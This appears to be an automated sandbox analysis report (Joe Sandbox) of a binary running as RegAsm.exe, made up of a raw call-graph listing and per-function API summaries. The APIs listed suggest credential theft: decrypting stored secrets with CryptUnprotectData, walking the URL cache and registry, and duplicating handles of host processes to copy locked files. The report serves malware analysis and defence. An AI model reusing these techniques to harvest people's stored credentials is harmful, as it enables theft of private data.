calls 38409->38837 38972 404363 38411->38972 38416 40b2cc 27 API calls 38417 40be02 wcslen 38416->38417 38418 40bf5d 38417->38418 38426 40be1e 38417->38426 38989 40440c 38418->38989 38419 40be26 wcsncmp 38419->38426 38422 40be7d memset 38423 40bea7 memcpy 38422->38423 38422->38426 38424 40bf11 wcschr 38423->38424 38423->38426 38424->38426 38425 40b2cc 27 API calls 38427 40bef6 _wcsnicmp 38425->38427 38426->38418 38426->38419 38426->38422 38426->38423 38426->38424 38426->38425 38428 40bf43 LocalFree 38426->38428 38992 40bd5d 28 API calls 38426->38992 38993 404423 38426->38993 38427->38424 38427->38426 38428->38426 38429 4135f7 39005 4135e0 38429->39005 38432 40b2cc 27 API calls 38433 41360d 38432->38433 38434 40a804 8 API calls 38433->38434 38435 413613 38434->38435 38436 41363e 38435->38436 38438 40b273 27 API calls 38435->38438 38437 4135e0 FreeLibrary 38436->38437 38439 413643 38437->38439 38440 413625 38438->38440 38439->38198 38440->38436 38441 413648 38440->38441 38442 413658 38441->38442 38443 4135e0 FreeLibrary 38441->38443 38442->38198 38444 413666 38443->38444 38444->38198 38447 4136e2 38445->38447 38446 413827 38644 41366b FreeLibrary 38446->38644 38447->38446 38448 4137ac CoTaskMemFree 38447->38448 38448->38447 39008 4449b9 38449->39008 38452 444c1f 38452->38184 38453 4449b9 35 API calls 38455 444b4b 38453->38455 38454 444c15 38457 4449b9 35 API calls 38454->38457 38455->38454 39028 444972 GetVersionExW 38455->39028 38457->38452 38458 444b99 memcmp 38462 444b8c 38458->38462 38459 444c0b 39032 444a85 35 API calls 38459->39032 38462->38458 38462->38459 39029 444aa5 35 API calls 38462->39029 39030 40a7a0 GetVersionExW 38462->39030 39031 444a85 35 API calls 38462->39031 38466 40399d 38465->38466 39033 403a16 38466->39033 38468 403a09 39047 40b1ab free free 38468->39047 38470 403a12 wcsrchr 38470->38191 38471 4039a3 38471->38468 38474 4039f4 38471->38474 39044 40a02c CreateFileW 38471->39044 38474->38468 38475 4099c6 2 API calls 38474->38475 38475->38468 
38477 414c2e 16 API calls 38476->38477 38478 404048 38477->38478 38479 414c2e 16 API calls 38478->38479 38480 404056 38479->38480 38481 409d1f 6 API calls 38480->38481 38482 404073 38481->38482 38483 409d1f 6 API calls 38482->38483 38484 40408e 38483->38484 38485 409d1f 6 API calls 38484->38485 38486 4040a6 38485->38486 38487 403af5 20 API calls 38486->38487 38488 4040ba 38487->38488 38489 403af5 20 API calls 38488->38489 38490 4040cb 38489->38490 39074 40414f memset 38490->39074 38492 4040e0 38493 404140 38492->38493 38495 4040ec memset 38492->38495 38497 4099c6 2 API calls 38492->38497 38498 40a8ab 9 API calls 38492->38498 39088 40b1ab free free 38493->39088 38495->38492 38496 404148 38496->38251 38497->38492 38498->38492 39101 40a6e6 WideCharToMultiByte 38499->39101 38501 4087ed 39102 4095d9 memset 38501->39102 38504 408809 memset memset memset memset memset 38505 40b2cc 27 API calls 38504->38505 38506 4088a1 38505->38506 38507 409d1f 6 API calls 38506->38507 38508 4088b1 38507->38508 38509 40b2cc 27 API calls 38508->38509 38510 4088c0 38509->38510 38511 409d1f 6 API calls 38510->38511 38512 4088d0 38511->38512 38513 40b2cc 27 API calls 38512->38513 38514 4088df 38513->38514 38515 409d1f 6 API calls 38514->38515 38516 4088ef 38515->38516 38517 40b2cc 27 API calls 38516->38517 38518 4088fe 38517->38518 38519 409d1f 6 API calls 38518->38519 38520 40890e 38519->38520 38521 40b2cc 27 API calls 38520->38521 38522 40891d 38521->38522 38523 409d1f 6 API calls 38522->38523 38524 40892d 38523->38524 39119 409b98 GetFileAttributesW 38524->39119 38526 40893e 38527 408943 38526->38527 38528 408958 38526->38528 39120 407fdf 75 API calls 38527->39120 39121 409b98 GetFileAttributesW 38528->39121 38531 408964 38532 408969 38531->38532 38533 40897b 38531->38533 39122 4082c7 198 API calls 38532->39122 38536 408953 38536->38251 38551 40b633 free 38550->38551 38552 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38551->38552 38553 413f00 Process32NextW 38552->38553 38554 
413da5 OpenProcess 38553->38554 38555 413f17 CloseHandle 38553->38555 38556 413df3 memset 38554->38556 38559 413eb0 38554->38559 38555->38294 39151 413f27 38556->39151 38558 413ebf free 38558->38559 38559->38553 38559->38558 38560 4099f4 3 API calls 38559->38560 38560->38559 38561 413e37 GetModuleHandleW 38563 413e46 38561->38563 38565 413e1f 38561->38565 38563->38565 38564 413e6a QueryFullProcessImageNameW 38564->38565 38565->38561 38565->38564 39156 413959 38565->39156 39172 413ca4 38565->39172 38567 413ea2 CloseHandle 38567->38559 38569 414c2e 16 API calls 38568->38569 38570 403eb7 38569->38570 38571 414c2e 16 API calls 38570->38571 38572 403ec5 38571->38572 38573 409d1f 6 API calls 38572->38573 38574 403ee2 38573->38574 38575 409d1f 6 API calls 38574->38575 38576 403efd 38575->38576 38577 409d1f 6 API calls 38576->38577 38578 403f15 38577->38578 38579 403af5 20 API calls 38578->38579 38580 403f29 38579->38580 38581 403af5 20 API calls 38580->38581 38582 403f3a 38581->38582 38583 40414f 33 API calls 38582->38583 38589 403f4f 38583->38589 38584 403faf 39185 40b1ab free free 38584->39185 38585 403f5b memset 38585->38589 38587 403fb7 38587->38233 38588 4099c6 2 API calls 38588->38589 38589->38584 38589->38585 38589->38588 38590 40a8ab 9 API calls 38589->38590 38590->38589 38592 414c2e 16 API calls 38591->38592 38593 403d26 38592->38593 38594 414c2e 16 API calls 38593->38594 38595 403d34 38594->38595 38596 409d1f 6 API calls 38595->38596 38597 403d51 38596->38597 38598 409d1f 6 API calls 38597->38598 38599 403d6c 38598->38599 38600 409d1f 6 API calls 38599->38600 38601 403d84 38600->38601 38602 403af5 20 API calls 38601->38602 38603 403d98 38602->38603 38604 403af5 20 API calls 38603->38604 38605 403da9 38604->38605 38606 40414f 33 API calls 38605->38606 38612 403dbe 38606->38612 38607 403e1e 39186 40b1ab free free 38607->39186 38608 403dca memset 38608->38612 38610 403e26 38610->38249 38611 4099c6 2 API calls 38611->38612 38612->38607 38612->38608 38612->38611 
38613 40a8ab 9 API calls 38612->38613 38613->38612 38615 414b81 8 API calls 38614->38615 38616 414c40 38615->38616 38617 414c73 memset 38616->38617 39187 409cea 38616->39187 38619 414c94 38617->38619 39190 414592 RegOpenKeyExW 38619->39190 38621 414c64 SHGetSpecialFolderPathW 38623 414d0b 38621->38623 38623->38253 38624 414cc1 38625 414cf4 wcscpy 38624->38625 39191 414bb0 wcscpy 38624->39191 38625->38623 38627 414cd2 39192 4145ac RegQueryValueExW 38627->39192 38629 414ce9 RegCloseKey 38629->38625 38631 409d62 38630->38631 38632 409d43 wcscpy 38630->38632 38635 445389 38631->38635 38633 409719 2 API calls 38632->38633 38634 409d51 wcscat 38633->38634 38634->38631 38636 40ae18 9 API calls 38635->38636 38637 4453c4 38636->38637 38638 40ae51 9 API calls 38637->38638 38639 4453f3 38637->38639 38640 40add4 2 API calls 38637->38640 38643 445403 250 API calls 38637->38643 38638->38637 38641 40aebe FindClose 38639->38641 38640->38637 38642 4453fe 38641->38642 38642->38301 38643->38637 38644->38205 38645->38297 38646->38281 38647->38281 38648->38311 38650 409c89 38649->38650 38650->38336 38651->38365 38653 413d39 38652->38653 38654 413d2f FreeLibrary 38652->38654 38655 40b633 free 38653->38655 38654->38653 38656 413d42 38655->38656 38657 40b633 free 38656->38657 38658 413d4a 38657->38658 38658->38327 38659->38234 38660->38241 38661->38263 38663 44db70 38662->38663 38664 40b6fc memset 38663->38664 38665 409c70 2 API calls 38664->38665 38666 40b732 wcsrchr 38665->38666 38667 40b743 38666->38667 38668 40b746 memset 38666->38668 38667->38668 38669 40b2cc 27 API calls 38668->38669 38670 40b76f 38669->38670 38671 409d1f 6 API calls 38670->38671 38672 40b783 38671->38672 39193 409b98 GetFileAttributesW 38672->39193 38674 40b792 38676 409c70 2 API calls 38674->38676 38688 40b7c2 38674->38688 38678 40b7a5 38676->38678 38681 40b2cc 27 API calls 38678->38681 38679 40b837 CloseHandle 38683 40b83e memset 38679->38683 38680 40b817 39277 409a45 GetTempPathW 38680->39277 38684 40b7b2 
38681->38684 39227 40a6e6 WideCharToMultiByte 38683->39227 38685 409d1f 6 API calls 38684->38685 38685->38688 38686 40b827 38686->38683 39194 40bb98 38688->39194 38689 40b866 39228 444432 38689->39228 38692 40bad5 38695 40b04b ??3@YAXPAX 38692->38695 38693 40b273 27 API calls 38694 40b89a 38693->38694 39274 438552 38694->39274 38697 40baf3 38695->38697 38697->38274 38699 40bacd 39308 443d90 110 API calls 38699->39308 38702 40bac6 39307 424f26 122 API calls 38702->39307 38703 40b8bd memset 39298 425413 17 API calls 38703->39298 38706 425413 17 API calls 38724 40b8b8 38706->38724 38709 40a71b MultiByteToWideChar 38709->38724 38710 40a734 MultiByteToWideChar 38710->38724 38713 40b9b5 memcmp 38713->38724 38714 4099c6 2 API calls 38714->38724 38715 404423 37 API calls 38715->38724 38718 4251c4 136 API calls 38718->38724 38719 40bb3e memset memcpy 39309 40a734 MultiByteToWideChar 38719->39309 38721 40bb88 LocalFree 38721->38724 38724->38702 38724->38703 38724->38706 38724->38709 38724->38710 38724->38713 38724->38714 38724->38715 38724->38718 38724->38719 38725 40ba5f memcmp 38724->38725 39299 4253ef 16 API calls 38724->39299 39300 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38724->39300 39301 4253af 17 API calls 38724->39301 39302 4253cf 17 API calls 38724->39302 39303 447280 memset 38724->39303 39304 447960 memset memcpy memcpy memcpy 38724->39304 39305 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38724->39305 39306 447920 memcpy memcpy memcpy 38724->39306 38725->38724 38726->38276 38728 40aebe FindClose 38727->38728 38729 40ae21 38728->38729 38730 4099c6 2 API calls 38729->38730 38731 40ae35 38730->38731 38732 409d1f 6 API calls 38731->38732 38733 40ae49 38732->38733 38733->38340 38735 40ade0 38734->38735 38736 40ae0f 38734->38736 38735->38736 38737 40ade7 wcscmp 38735->38737 38736->38340 38737->38736 38738 40adfe wcscmp 38737->38738 38738->38736 38740 40ae7b FindNextFileW 38739->38740 38741 40ae5c FindFirstFileW 38739->38741 38742 40ae94 38740->38742 38743 40ae8f 
38740->38743 38741->38742 38745 40aeb6 38742->38745 38746 409d1f 6 API calls 38742->38746 38744 40aebe FindClose 38743->38744 38744->38742 38745->38340 38746->38745 38748 40aed1 38747->38748 38749 40aec7 FindClose 38747->38749 38748->38202 38749->38748 38751 4099d7 38750->38751 38752 4099da memcpy 38750->38752 38751->38752 38752->38259 38754 40b2cc 27 API calls 38753->38754 38755 44543f 38754->38755 38756 409d1f 6 API calls 38755->38756 38757 44544f 38756->38757 39698 409b98 GetFileAttributesW 38757->39698 38759 44545e 38760 445476 38759->38760 38761 40b6ef 249 API calls 38759->38761 38762 40b2cc 27 API calls 38760->38762 38761->38760 38763 445482 38762->38763 38764 409d1f 6 API calls 38763->38764 38765 445492 38764->38765 39699 409b98 GetFileAttributesW 38765->39699 38767 4454a1 38768 4454b9 38767->38768 38769 40b6ef 249 API calls 38767->38769 38768->38279 38769->38768 38770->38278 38771->38302 38772->38308 38773->38343 38774->38323 38775->38373 38776->38373 38777->38354 38778->38384 38779->38386 38780->38388 38782 414c2e 16 API calls 38781->38782 38783 40c2ae 38782->38783 38839 40c1d3 38783->38839 38788 40c3be 38805 40a8ab 38788->38805 38789 40afcf 2 API calls 38790 40c2fd FindFirstUrlCacheEntryW 38789->38790 38791 40c3b6 38790->38791 38792 40c31e wcschr 38790->38792 38793 40b04b ??3@YAXPAX 38791->38793 38794 40c331 38792->38794 38795 40c35e FindNextUrlCacheEntryW 38792->38795 38793->38788 38797 40a8ab 9 API calls 38794->38797 38795->38792 38796 40c373 GetLastError 38795->38796 38798 40c3ad FindCloseUrlCache 38796->38798 38799 40c37e 38796->38799 38800 40c33e wcschr 38797->38800 38798->38791 38801 40afcf 2 API calls 38799->38801 38800->38795 38802 40c34f 38800->38802 38803 40c391 FindNextUrlCacheEntryW 38801->38803 38804 40a8ab 9 API calls 38802->38804 38803->38792 38803->38798 38804->38795 38933 40a97a 38805->38933 38808 40a8cc 38808->38395 38809 40a8d0 7 API calls 38809->38808 38938 40b1ab free free 38810->38938 38812 40c3dd 38813 40b2cc 27 API calls 
38812->38813 38814 40c3e7 38813->38814 38939 414592 RegOpenKeyExW 38814->38939 38816 40c3f4 38817 40c50e 38816->38817 38818 40c3ff 38816->38818 38832 405337 38817->38832 38819 40a9ce 4 API calls 38818->38819 38820 40c418 memset 38819->38820 38940 40aa1d 38820->38940 38823 40c471 38825 40c47a _wcsupr 38823->38825 38824 40c505 RegCloseKey 38824->38817 38826 40a8d0 7 API calls 38825->38826 38827 40c498 38826->38827 38828 40a8d0 7 API calls 38827->38828 38829 40c4ac memset 38828->38829 38830 40aa1d 38829->38830 38831 40c4e4 RegEnumValueW 38830->38831 38831->38824 38831->38825 38942 405220 38832->38942 38834 405340 38834->38409 38835->38406 38836->38408 38837->38409 38838->38402 38840 40ae18 9 API calls 38839->38840 38846 40c210 38840->38846 38841 40ae51 9 API calls 38841->38846 38842 40c264 38843 40aebe FindClose 38842->38843 38845 40c26f 38843->38845 38844 40add4 2 API calls 38844->38846 38851 40e5ed memset memset 38845->38851 38846->38841 38846->38842 38846->38844 38847 40c231 _wcsicmp 38846->38847 38848 40c1d3 34 API calls 38846->38848 38847->38846 38849 40c248 38847->38849 38848->38846 38864 40c084 21 API calls 38849->38864 38852 414c2e 16 API calls 38851->38852 38853 40e63f 38852->38853 38854 409d1f 6 API calls 38853->38854 38855 40e658 38854->38855 38865 409b98 GetFileAttributesW 38855->38865 38857 40e667 38858 409d1f 6 API calls 38857->38858 38860 40e680 38857->38860 38858->38860 38866 409b98 GetFileAttributesW 38860->38866 38861 40e68f 38862 40c2d8 38861->38862 38867 40e4b2 38861->38867 38862->38788 38862->38789 38864->38846 38865->38857 38866->38861 38888 40e01e 38867->38888 38869 40e593 38870 40e5b0 38869->38870 38871 40e59c DeleteFileW 38869->38871 38872 40b04b ??3@YAXPAX 38870->38872 38871->38870 38874 40e5bb 38872->38874 38873 40e521 38873->38869 38911 40e175 38873->38911 38876 40e5c4 CloseHandle 38874->38876 38877 40e5cc 38874->38877 38876->38877 38879 40b633 free 38877->38879 38878 40e573 38880 40e584 38878->38880 38881 40e57c CloseHandle 38878->38881 
38882 40e5db 38879->38882 38932 40b1ab free free 38880->38932 38881->38880 38883 40b633 free 38882->38883 38885 40e5e3 38883->38885 38885->38862 38887 40e540 38887->38878 38931 40e2ab 30 API calls 38887->38931 38889 406214 22 API calls 38888->38889 38890 40e03c 38889->38890 38891 40e16b 38890->38891 38892 40dd85 60 API calls 38890->38892 38891->38873 38893 40e06b 38892->38893 38893->38891 38894 40afcf ??2@YAPAXI ??3@YAXPAX 38893->38894 38895 40e08d OpenProcess 38894->38895 38896 40e0a4 GetCurrentProcess DuplicateHandle 38895->38896 38900 40e152 38895->38900 38897 40e0d0 GetFileSize 38896->38897 38898 40e14a CloseHandle 38896->38898 38901 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38897->38901 38898->38900 38899 40e160 38903 40b04b ??3@YAXPAX 38899->38903 38900->38899 38902 406214 22 API calls 38900->38902 38904 40e0ea 38901->38904 38902->38899 38903->38891 38905 4096dc CreateFileW 38904->38905 38906 40e0f1 CreateFileMappingW 38905->38906 38907 40e140 CloseHandle CloseHandle 38906->38907 38908 40e10b MapViewOfFile 38906->38908 38907->38898 38909 40e13b CloseHandle 38908->38909 38910 40e11f WriteFile UnmapViewOfFile 38908->38910 38909->38907 38910->38909 38912 40e18c 38911->38912 38913 406b90 11 API calls 38912->38913 38914 40e19f 38913->38914 38915 40e1a7 memset 38914->38915 38916 40e299 38914->38916 38921 40e1e8 38915->38921 38917 4069a3 ??3@YAXPAX free 38916->38917 38918 40e2a4 38917->38918 38918->38887 38919 406e8f 13 API calls 38919->38921 38920 406b53 SetFilePointerEx ReadFile 38920->38921 38921->38919 38921->38920 38922 40dd50 _wcsicmp 38921->38922 38923 40e283 38921->38923 38927 40742e 8 API calls 38921->38927 38928 40aae3 wcslen wcslen _memicmp 38921->38928 38929 40e244 _snwprintf 38921->38929 38922->38921 38924 40e291 38923->38924 38925 40e288 free 38923->38925 38926 40aa04 free 38924->38926 38925->38924 38926->38916 38927->38921 38928->38921 38930 40a8d0 7 API calls 38929->38930 38930->38921 38931->38887 38932->38869 38935 40a980 
38933->38935 38934 40a8bb 38934->38808 38934->38809 38935->38934 38936 40a995 _wcsicmp 38935->38936 38937 40a99c wcscmp 38935->38937 38936->38935 38937->38935 38938->38812 38939->38816 38941 40aa23 RegEnumValueW 38940->38941 38941->38823 38941->38824 38943 40522a 38942->38943 38968 405329 38942->38968 38944 40b2cc 27 API calls 38943->38944 38945 405234 38944->38945 38946 40a804 8 API calls 38945->38946 38947 40523a 38946->38947 38969 40b273 38947->38969 38949 405248 _mbscpy _mbscat 38950 40526c 38949->38950 38951 40b273 27 API calls 38950->38951 38952 405279 38951->38952 38953 40b273 27 API calls 38952->38953 38954 40528f 38953->38954 38955 40b273 27 API calls 38954->38955 38956 4052a5 38955->38956 38957 40b273 27 API calls 38956->38957 38958 4052bb 38957->38958 38959 40b273 27 API calls 38958->38959 38960 4052d1 38959->38960 38961 40b273 27 API calls 38960->38961 38962 4052e7 38961->38962 38963 40b273 27 API calls 38962->38963 38964 4052fd 38963->38964 38965 40b273 27 API calls 38964->38965 38966 405313 38965->38966 38967 40b273 27 API calls 38966->38967 38967->38968 38968->38834 38970 40b58d 27 API calls 38969->38970 38971 40b18c 38970->38971 38971->38949 38973 40440c FreeLibrary 38972->38973 38974 40436d 38973->38974 38975 40a804 8 API calls 38974->38975 38976 404377 38975->38976 38977 4043f7 38976->38977 38978 40b273 27 API calls 38976->38978 38977->38416 38977->38418 38979 40438d 38978->38979 38980 40b273 27 API calls 38979->38980 38981 4043a7 38980->38981 38982 40b273 27 API calls 38981->38982 38983 4043ba 38982->38983 38984 40b273 27 API calls 38983->38984 38985 4043ce 38984->38985 38986 40b273 27 API calls 38985->38986 38987 4043e2 38986->38987 38987->38977 38988 40440c FreeLibrary 38987->38988 38988->38977 38990 404413 FreeLibrary 38989->38990 38991 40441e 38989->38991 38990->38991 38991->38429 38992->38426 38994 40447e 38993->38994 38995 40442e 38993->38995 38996 404485 CryptUnprotectData 38994->38996 38997 40449c 38994->38997 38998 40b2cc 27 API calls 
38995->38998 38996->38997 38997->38426 38999 404438 38998->38999 39000 40a804 8 API calls 38999->39000 39001 40443e 39000->39001 39002 40444f 39001->39002 39003 40b273 27 API calls 39001->39003 39002->38994 39004 404475 FreeLibrary 39002->39004 39003->39002 39004->38994 39006 4135f6 39005->39006 39007 4135eb FreeLibrary 39005->39007 39006->38432 39007->39006 39009 4449c4 39008->39009 39027 444a48 39008->39027 39010 40b2cc 27 API calls 39009->39010 39011 4449cb 39010->39011 39012 40a804 8 API calls 39011->39012 39013 4449d1 39012->39013 39014 40b273 27 API calls 39013->39014 39015 4449dc 39014->39015 39016 40b273 27 API calls 39015->39016 39017 4449f3 39016->39017 39018 40b273 27 API calls 39017->39018 39019 444a04 39018->39019 39020 40b273 27 API calls 39019->39020 39021 444a15 39020->39021 39022 40b273 27 API calls 39021->39022 39023 444a26 39022->39023 39024 40b273 27 API calls 39023->39024 39025 444a37 39024->39025 39026 40b273 27 API calls 39025->39026 39026->39027 39027->38452 39027->38453 39028->38462 39029->38462 39030->38462 39031->38462 39032->38454 39034 403a29 39033->39034 39048 403bed memset memset 39034->39048 39036 403ae7 39061 40b1ab free free 39036->39061 39037 403a3f memset 39041 403a2f 39037->39041 39039 403aef 39039->38471 39040 409d1f 6 API calls 39040->39041 39041->39036 39041->39037 39041->39040 39042 409b98 GetFileAttributesW 39041->39042 39043 40a8d0 7 API calls 39041->39043 39042->39041 39043->39041 39045 40a051 GetFileTime CloseHandle 39044->39045 39046 4039ca CompareFileTime 39044->39046 39045->39046 39046->38471 39047->38470 39049 414c2e 16 API calls 39048->39049 39050 403c38 39049->39050 39051 409719 2 API calls 39050->39051 39052 403c3f wcscat 39051->39052 39053 414c2e 16 API calls 39052->39053 39054 403c61 39053->39054 39055 409719 2 API calls 39054->39055 39056 403c68 wcscat 39055->39056 39062 403af5 39056->39062 39059 403af5 20 API calls 39060 403c95 39059->39060 39060->39041 39061->39039 39063 403b02 39062->39063 39064 40ae18 9 API 

Control-flow Graph

[Figure: control-flow graph 338 for the function starting at 0040DD85; legend: Executed / Not Executed]
APIs
• memset.MSVCRT ref: 0040DDAD
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
• CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
• NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
• CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
• GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
• _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                                                                                                                      • DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DF5F
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(C0000004), ref: 0040DF92
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000104), ref: 0040DFF2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                                                                                                                      • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                                                                                                      • API String ID: 2018390131-3398334509
                                                                                                                                                                                                                      • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                                                                      • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413D7F
                                                                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413E07
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                                                                                                      • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00413EA8
                                                                                                                                                                                                                      • free.MSVCRT ref: 00413EC1
                                                                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00413F1A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Handle$CloseProcessProcess32freememset$CreateFirstFullImageModuleNameNextOpenQuerySnapshotToolhelp32
                                                                                                                                                                                                                      • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                                                                      • API String ID: 3957639419-1740548384
                                                                                                                                                                                                                      • Opcode ID: 49940329a591e45662842b0713840e3f666fa521b7868de24c85cfebece9aff1
                                                                                                                                                                                                                      • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 49940329a591e45662842b0713840e3f666fa521b7868de24c85cfebece9aff1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                                                                                                                      • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                                                                                      • String ID: BIN
                                                                                                                                                                                                                      • API String ID: 1668488027-1015027815
                                                                                                                                                                                                                      • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                                                      • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                                        • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                                        • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                                                                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                                                                                      • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                                                                                                      • free.MSVCRT ref: 00418803
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1355100292-0
                                                                                                                                                                                                                      • Opcode ID: 940d27dee81e78af7b1dcfc54f007828992184dafba41df18b595ae7ea53f8f2
                                                                                                                                                                                                                      • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 940d27dee81e78af7b1dcfc54f007828992184dafba41df18b595ae7ea53f8f2
